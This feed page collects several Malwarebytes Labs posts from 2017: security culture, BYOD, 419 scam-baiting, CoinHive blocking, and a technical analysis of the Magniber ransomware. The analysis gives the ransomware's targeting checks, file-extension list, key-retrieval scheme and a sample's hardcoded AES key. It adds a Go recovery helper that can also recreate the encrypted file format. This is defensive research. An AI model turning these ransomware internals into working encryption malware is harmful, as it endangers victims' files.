Techie Feeds

How to create an intentional culture of security

Malwarebytes - Thu, 10/19/2017 - 18:00

In this day and age, companies great and small are vulnerable to potential attacks that they are exposed to every day. From insider threats to simple phishing, one is always left guessing if they know enough to handle them or are well prepared to face the risks. Educating your staff about basic computing hygiene is one thing, but ingraining in them security practices that they do almost naturally, even beyond the confines of the office, is another. The latter involves being part of a culture where people think, act, and behave the same way. And we’re not just talking about an organic culture, but one that was created with intentionality at the core.

Before going further, let’s first find out why it’s important that we create and cultivate an intentional culture of security. We’ll also name a few misconceptions surrounding security culture and attempt to clear up each one.

Why a culture of security is needed

A culture of security in the workplace has always existed, even in the pre-computing era, although back then it was mainly about physical security. A large area of the office is off-limits to the public, and only those with an access card or proper company identification can go in and out. Not everyone has the key to the HR filing cabinets. And when computers were introduced in the business world, confidential files shared among managers and executives were (and still are) for their eyes only.

Things have changed dramatically since then. Businesses maintain the physical defenses of their assets, but are hard-pressed to stave off threats from the digital realm. There is now a need for organizations to secure their online assets, but criminals have become adept at circumventing basic protections. Despite this, the negative perception people have about security—it’s reactionary, it hinders one from conveniently doing their job—persists today. This negativity is a dominant hindrance in further establishing and sustaining a culture of security.

It’s important to have a strong security culture because security is a strategic necessity, whether it’s protecting the data of customers or building relationships and offering services to other business clients. As such, trust is essential. Without sufficient security present in an organization, those doing business with companies would be doubtful and uncertain that their assets are treated with importance and utmost confidentiality as they should. (Note how Equifax stock dropped dramatically after their massive breach was discovered.)

On the other hand, a company with sufficient security has the advantage over competitors that do not have one. When data and assets are protected, trust increases.

Finally, having a security culture in place makes compliance with laws and regulations easier. As regulators start imposing security practices that, frankly, should have been present in companies to begin with, organizations with a security mindset are more receptive to adopting these practices and imbibing them into the current culture.

Read: Make way for the GDPR: Is your business ready?

Misconceptions about a security culture

A culture of security could mean different things to different people. And just like any concept we strive to understand, there are misconceptions about them along the way. If left alone, these misunderstandings could persist, be passed on, or (worse) be treated as facts in the long run. We’ve identified and debunked some of them below.

  • The culture aims to maximize security. A majority of us assume that to improve on security, a company must make use of all security tools at their disposal. Again, this might work with organizations that handle information that is deemed sensitive and valuable, but it doesn’t apply to all companies. A culture aims to optimize security. This means making the most efficient use of resources that are available to them.
  • Having a culture of security in place will stop breaches dead. Unfortunately, this is not a guarantee. People, even well-meaning ones, make mistakes. And often, those errors can cost companies big. A culture of security does not create perfect security; however, it paves the way towards achieving best-possible security. This cannot be accomplished without people in the workplace supporting the concept.
  • A culture of security is IT’s responsibility. On the contrary, every member of the organization is responsible for its security, including the assets it uses, processes, and shares. Everyone plays a part, and no one is exempted. IT can put in place all the technological checks and balances to ward off attacks, but if a user mindlessly clicks on a phishing email, it’s game over. Although some may still choose to ignore culture and policy, that doesn’t make this misconception any more valid.
  • A culture of security must start from the top. It’s a brilliant idea for senior management to not just talk the talk but also walk the walk, but culture doesn’t necessarily have to start with the higher-ups. What it needs are people committed enough to continue to nurture good security practices that are aligned with the organization’s objectives and well integrated with other cultures. This is why these committed people are dubbed champions.
Practical steps to foster a culture of cybersecurity

1. Recognize that security is seen in a negative light; thus, there is a need to help others realize that it’s actually a positive enabler of the company’s initiatives. This is especially true for companies in industries that handle a lot of sensitive personally identifiable information (e.g., banks, hospitals, and intelligence agencies). It’s true that when one thinks of security (or the lack thereof), we often think of preventing fraud, breaches, and hacking. However, trust, consistency, reliability, productivity, and predictability are also terms that we can associate with security. Champions should frame it as such.

2. Assess the current state of the organization’s security culture. Like we said earlier, a culture of security has always existed. But whether the culture is good or bad is another question entirely. Security champions within the company must discover the gaps, and then figure out how to bridge them.

3. Create a positive brand for the security culture. Champions can enlist the help of marketing in this. Think of one thing employees might gravitate to (Cat videos? Outdoor activities? Battlestar Galactica?), and use it to convey a unified message to the organization. Then, to further develop the brand, tailor the message according to the benefits of security for each department. Branding can be broadcast via internal memos and newsletters, screensavers, and even posters that employees can see wherever they go.

4. Hold awareness campaigns to educate would-be champions. Here’s the twist: Don’t start on the wrong foot by, say, introducing statistics about hacking and phishing. Instead, the champion should educate their peers on what security is, what their specific roles in it are, and how accountable they are to the company’s resources (e.g., information) that they handle. If one doesn’t know how to fulfill his/her responsibility, further education may be needed.

5. Reward those who support a culture of security. This should also include decision-makers who make it a point to consider the security of information and other valuable enterprise assets before giving a plan the go signal. Although some seek monetary incentive, many do not. At the very least, the champion (and the company) must recognize and attribute a good outcome based on security mindfulness when they see one.

Oh, and one more thing

We believe and often parrot the adage “People are the weakest link.” That the security problem exists between the chair and the monitor. Sadly, this negative notion has affected how we continue to perceive and respond to our peers at work who clicked that link, to clients who are asking for support on a simple matter, even to our younger and older family members who aren’t as technologically savvy as we are. One purpose of fostering a culture of security is not to address them as the weakest link, but instead make people realize that they are our only link in security. A collective understanding that security is supposed to work for people and for the organization, not the other way around, is something that we should all aim and strive to achieve.

Other related post(s):

The post How to create an intentional culture of security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BYOD, why don’t you?

Malwarebytes - Thu, 10/19/2017 - 17:16

Bring Your Own Device (BYOD) is a policy that allows employees to bring their own devices to the workplace and use them there. At one time, this was the latest bonus to attract and keep employees happy—plus save a few bucks. Nowadays the question is more like: Is there anyone who doesn’t bring his own device (at least a smartphone) to the workplace?

But BYOD is more than just bringing your device along. The expression also implies that you can use your own device to access and use corporate resources. But what are the security issues that this policy opens up for both parties?

The risks for the company
  • People outside the company get access. Access by someone outside of the company can happen due to devices being stolen or by people leaving the company.
  • Devices leave the company environment. Outside the company environment, the devices are still carrying important information and may be used to access insecure networks elsewhere.
  • Devices might not be protected or patched. BYOD devices might not be protected as well as the devices that are under the control of the company’s IT department. This works both ways, since many companies have a slow patching process to keep legacy applications running and to allow for testing before patches and updates are rolled out. Either way, a discrepancy in updates and patches can result in problems for both sides.
The risks for the employee owner
  • This limits the use of the device outside the company. The employee has to be more vigilant than they might be if they didn’t use the device for company matters. For example, browsing in a coffee shop on an open network might be prohibited, or at least dangerous, on that device.
  • Who is to blame in case of leaks? Pointing the finger for who is to blame, or fearing the repercussions, can ruin a healthy work relationship. Employees might be more liable if they used a BYOD device instead of a work-issued one.
  • There might be a discrepancy in patching and updates. The employee may have to wait before patching or updating their operating system or the applications that are used in the workplace. This leaves both work and personal data vulnerable.
Mitigating the risks

To limit the downside and keep possible damage to a minimum, it helps to:

  • Have a clear policy and rules to enforce it. A well thought out policy about BYOD allows you to set rules that everyone understands—not only understand what the rules prescribe, but also why they are needed.
  • Have an active mobile device management solution. Even if there are no mobile devices owned by the company itself, there needs to be mobile device management to keep the company-controlled data and applications separated from the private ones.
  • Use strong authentication and encryption methods. A suitable method of strong authentication enables you to shut out the owners of stolen devices and terminated accounts. Encryption can also keep your communications and data safe from prying eyes.

Allowing your staff to BYOD has mutual benefits, but we recommend taking some precautions if you don’t want the downside to outweigh the good. Being aware of the potential dangers is important, but only a small part of what needs to be done. Securing personal devices at the workplace and securing workplace devices at home is equally important, as well as creating and implementing a strong cybersecurity policy that covers this type of flexibility. Take these steps and you can better enjoy a less cumbersome, more fluid work environment.

The post BYOD, why don’t you? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Magniber ransomware: exclusively for South Koreans

Malwarebytes - Thu, 10/19/2017 - 00:29

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples

Older sample

Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems with Korean language detected. The executable is pretty noisy, because it implements various tasks just by command line. Running it on the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can see also the ransom note and yet another file. Its name is the same as the part of the domain that has been generated for the particular user, and its extension is the same as the extension of the encrypted files:

To each encrypted file is added an extension that is composed of lowercase Latin characters and is constant for the particular sample of Magniber.

The same plaintext produces the same ciphertext. This means each and every file is encrypted using exactly the same key.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version, which suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting to domains that are generated by the built-in algorithm. The same domains that are used as CnC are later used for the individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). If any other language is detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself
What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx xd 
xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov avi asf mpeg vob mpg wmv fla swf wav mp3

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:\documents and settings\all users\ :\documents and settings\default user\ :\documents and settings\localservice\ :\documents and settings\networkservice\ \appdata\local\ \appdata\locallow\ \appdata\roaming\ \local settings\ \public\music\sample music\ \public\pictures\sample pictures\ \public\videos\sample videos\ \tor browser\ \$recycle.bin \$windows.~bt \$windows.~ws \boot \intel \msocache \perflogs \program files (x86) \program files \programdata \recovery \recycled \recycler \system volume information \windows.old \windows10upgrade \windows \winnt

How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending on whether the sample is running under a debugger or not (detected using a timing check).

Four domains are being queried for the key:

If any of them returns a 16-byte long response, that response is treated as the valid key: it is copied to the buffer and used from then on. Otherwise, the malware falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with the AES key hardcoded. However, it is used only as a backup if downloading the key from the CnC was for some reason impossible (that occurs also in the case if the public IP was not from Korea). The key is unique per each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

Similarly, the initialization vector is always hardcoded in the sample (but not downloaded). The same 16-character long string was also saved at the file beginning. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

First, the crypto context is initialized. The malware imports the key and initialization vector with the help of functions CryptImportKey, CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte long string (the same one used as the IV) at the beginning of the file. Then, the file is read chunk by chunk and encrypted using the Windows Crypto API.
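The file layout described above (a 16-byte identifier that doubles as the IV, followed by an AES-128-CBC body) is enough to write a triage and recovery helper for the fallback-key case. The following Go program is an added example, not code from the original post or from Magniber; it uses the key and IV of the analyzed sample as quoted in the text, assumes PKCS#7 padding (the CryptEncrypt default for block ciphers, not stated on the page), and builds its own constructed test file so it runs offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Values quoted in the analysis for the currently analyzed sample.
var (
	// 16-character identifier written at the start of every encrypted file; also the IV.
	sampleMarker = []byte("EP866p5M93wDS513")
	// Hardcoded AES-128 key used only when the key download from the CnC fails.
	fallbackKey = []byte("S25943n9Gt099y4K")
)

// pkcs7Pad / pkcs7Unpad implement the padding assumed for CryptEncrypt with Final=TRUE.
func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("body length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size || n > len(b) {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// encryptMagniberLayout reproduces the on-disk layout from the analysis
// (marker, then AES-128-CBC with IV = marker) so constructed test files can be
// produced offline. It illustrates the format; it is not the malware's code.
func encryptMagniberLayout(plain, key, marker []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(append([]byte(nil), plain...), aes.BlockSize)
	out := make([]byte, len(marker)+len(padded))
	copy(out, marker)
	cipher.NewCBCEncrypter(block, marker).CryptBlocks(out[len(marker):], padded)
	return out, nil
}

// isMagniberEncrypted is the triage check: the file starts with the sample's
// marker and the remainder is a whole number of AES blocks.
func isMagniberEncrypted(data, marker []byte) bool {
	return len(data) > len(marker) &&
		bytes.HasPrefix(data, marker) &&
		(len(data)-len(marker))%aes.BlockSize == 0
}

// recoverWithFallbackKey strips the marker and decrypts the body with the
// hardcoded key, using the marker as IV. It can only succeed for files encrypted
// with the fallback key; CnC-supplied keys are per victim and not known here.
func recoverWithFallbackKey(data, key, marker []byte) ([]byte, error) {
	if !isMagniberEncrypted(data, marker) {
		return nil, errors.New("not a Magniber-encrypted file for this sample")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	body := data[len(marker):]
	plain := make([]byte, len(body))
	cipher.NewCBCDecrypter(block, marker).CryptBlocks(plain, body)
	return pkcs7Unpad(plain, aes.BlockSize)
}

func main() {
	// Constructed sample document, not a real victim file.
	doc := []byte("Quarterly report - constructed sample document")
	enc, _ := encryptMagniberLayout(doc, fallbackKey, sampleMarker)
	enc2, _ := encryptMagniberLayout(doc, fallbackKey, sampleMarker)
	fmt.Println("marker present:", isMagniberEncrypted(enc, sampleMarker))
	// Same key and IV for every file: identical plaintext gives identical ciphertext,
	// which is the property observed in the analysis.
	fmt.Println("deterministic:", bytes.Equal(enc, enc2))
	back, err := recoverWithFallbackKey(enc, fallbackKey, sampleMarker)
	fmt.Printf("recovered: %q err=%v\n", back, err)
}
```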


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, approaching the same targets. However, internally it has nothing in common with Cerber and is much simpler. The only feature that makes it unique is being so picky about the targeted country. For the first time, we are seeing country checks being performed at various levels of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Categories: Techie Feeds

419 scammer offers USD $60 million—and a free child

Malwarebytes - Wed, 10/18/2017 - 18:46

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project. I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account. Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account. Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting have meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do— ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

I thought he might have Googled Hogwarts Express here, but my luck holds out:

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:

To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.

Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:


The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When an “Outstanding” rating from CNET isn’t enough

Malwarebytes - Wed, 10/18/2017 - 17:28

The editors at respected tech site CNET recently awarded Malwarebytes for Windows an “outstanding” rating of 4.5 stars out of five. In the review, editor Tom McNamara recommended Malwarebytes because the scanning engine is of “high quality,” it works well with Windows 10, and it does a good job of explaining processes in plain English. Malwarebytes for Windows was one of the very few security programs to earn more than four stars from both the editors and CNET users.

So you’d expect that it would be champagne, fist bumps, and free kittens all around for a job well done here at Malwarebytes Galactic HQ.

Nope. All we can think about is that half star that we didn’t get. Perfection is hardcoded into our company DNA. It has to be.

Because, the way we figure it, a cybercriminal has to be right only once, on one computer, anywhere on this big spinning top of ours, in order to be successful. And cybercriminals are taking a lot of shots—our products detect approximately three million pieces of malware on millions of devices every day. Every day. Which essentially means our job is never done.

This is the brutal math that keeps us up at night: millions of devices to protect, zero successful malware attacks. So we’re constantly tinkering with the Malwarebytes technology to make it smarter. In fact, the next version of Malwarebytes for Windows, version 3.3, is just around the corner. It’s our best protection yet—and we set that bar very high.

Now don’t get us wrong: We’re thankful and humbled by CNET’s recognition. Four and a half stars means we’re doing a really fine job delivering a malware-free existence to our customers, but that remaining half star is on our minds, no doubt.

The post When an “Outstanding” rating from CNET isn’t enough appeared first on Malwarebytes Labs.


Why is Malwarebytes blocking CoinHive?

Malwarebytes - Wed, 10/18/2017 - 15:00

If you’ve encountered a Malwarebytes web protection block for CoinHive over the last few weeks, you are either glad about it, angry about it, or don’t really care. Since September 19, the second most frequently blocked website for our customers has been CoinHive, and when we observe that immense amount of blocking (over 130 million blocks in a few weeks), we try to explain why we are doing what we are doing.

This post will describe what CoinHive is, what it is doing, and why we are blocking it. We’ll even tell you how to exclude this from your instance of Malwarebytes, if you decide to do so.

What is Cryptocurrency mining?

Do you remember when Bitcoin first came out? It was under the radar for a while—mainly hobbyists and folks involved in the development of the cryptocurrency platform paid attention to it. After a few years, Bitcoin (BTC) became more and more popular, leading to the emergence of an army of Bitcoin miners. Miner is a term used primarily to describe software or hardware (and those who use it) created and utilized for the sole purpose of crunching numbers for the cryptocurrency in return for a small share of the currency.

A lot of people got involved in BTC mining, which resulted in a bit of a mixed bag of technologies being created and distributed, and in some cases forcibly installed. Sometimes, a person with the intent and means can run dedicated BTC miners and collect their small fractions of currency until they get a decent amount, then exchange the coins for goods, services, or government-backed money (USD/GBP/etc.).

Cryptocurrency miners are usually VERY resource intensive. This is because you are asking your system to do immense calculations it probably wasn’t designed to do, quickly, which is fine if you’ve got the hardware for it. But if you are running a 10-year-old system you bought off the shelf, it could not only decrease the speed and efficiency of your system, but even damage the hardware.

Miner running on system while visiting The Pirate Bay. Notice the 100% CPU Usage

Over the years, we’ve also observed miners bundled with sketchy software and malware, as a means to make more money for the people behind this kind of garbage software. Meanwhile, Bitcoin exchange rates have skyrocketed, yet the amount of money that can be earned by mining BTC is incredibly low (because of how many people are also running these miners). Because of this, new cryptocurrencies have popped up.

Here is a list of the most popular cryptocurrencies back in July 2017, according to an article on Mashable:

  • Bitcoin
  • Ethereum
  • Litecoin
  • ZCash/Monero
  • Tezos

These are the most popular, and therefore the most valuable, because there has been heavy investment in their growth. It is no surprise then that more than one of these cryptocurrencies have had miners put in places they didn’t belong.

What is CoinHive?

CoinHive is a service that provides cryptocurrency miners you can deploy on your website using JavaScript. The coin of this particular realm is Monero (mentioned above), and it touts the claim that using JavaScript miners is an alternative to advertising revenue.

It offers API access for website owners to deploy a miner on their site and have it communicate with the CoinHive remote server; unfortunately, it also allows the miners to be run on user systems without user permission.

Why are we blocking it?

We do not claim that CoinHive is malicious, or even necessarily a bad idea. The concept of allowing folks to opt-in for an alternative to advertising, which has been plagued by everything from fake news to malvertising, is a noble one. The execution of it is another story.

We block CoinHive because there are site owners who do not ask for their users’ permission before running CPU-gorging applications on their systems. A regular Bitcoin miner could be incredibly simple or a powerhouse, depending on how much computing power the user running the miner wants to dedicate to it. The JavaScript version of a miner allows customization of how much mining to do per user system, but leaves that up to the site owner, who may want to slow your computer experience to a crawl.

Another torrent site running a Monero miner in the background, once again 100 percent CPU usage for visiting a website

Either way, for those that know about cryptocurrency miners and especially JavaScript versions of them, this may be a technology you want to see more of. If so, we include instructions on how to add an exception for CoinHive. However, for those that do not know about this kind of technology, its purpose, or what it could do to their system, we are not comfortable allowing greedy website owners to abuse these users and so, we block it.

How to add an exception

At Malwarebytes, we want to arm our users with knowledge about threats and the tools to protect themselves from those threats. However, we are not in the business of censoring or restricting access to a thing people want to use. For cases like CoinHive, it’s kind of a gray area, so in addition to telling you why we block this site and the danger associated with it, we will also tell you exactly how to get around our block.

Step 1: exclusion tab

Inside Malwarebytes for Windows, in the Settings area, is a tab for exclusions. You can navigate there manually or, after trying to reach the blocked site, you can just click on the Managed Exceptions button at the bottom of the notification.

Step 2: select exclusion type

Your next step is to select what kind of exclusion you want to make. You’ll be able to allow anything from applications to websites, and even exploits! Select the Website Block radio button and press Next.

Step 3: add exclusion

Finally, Malwarebytes will ask you for the website URL or IP address of the site you want to exclude. For CoinHive, you’ll need to exclude the website as well as the IP address associated with it.

Step 4: rinse and repeat

As I mentioned, you’ll need to add an exclusion for both the CoinHive URL and the IP address associated with its domain name. So please add exclusions for the following:


After you complete adding the exclusions, your exclusion list in the Malwarebytes interface should look like this:

Step 5: testing

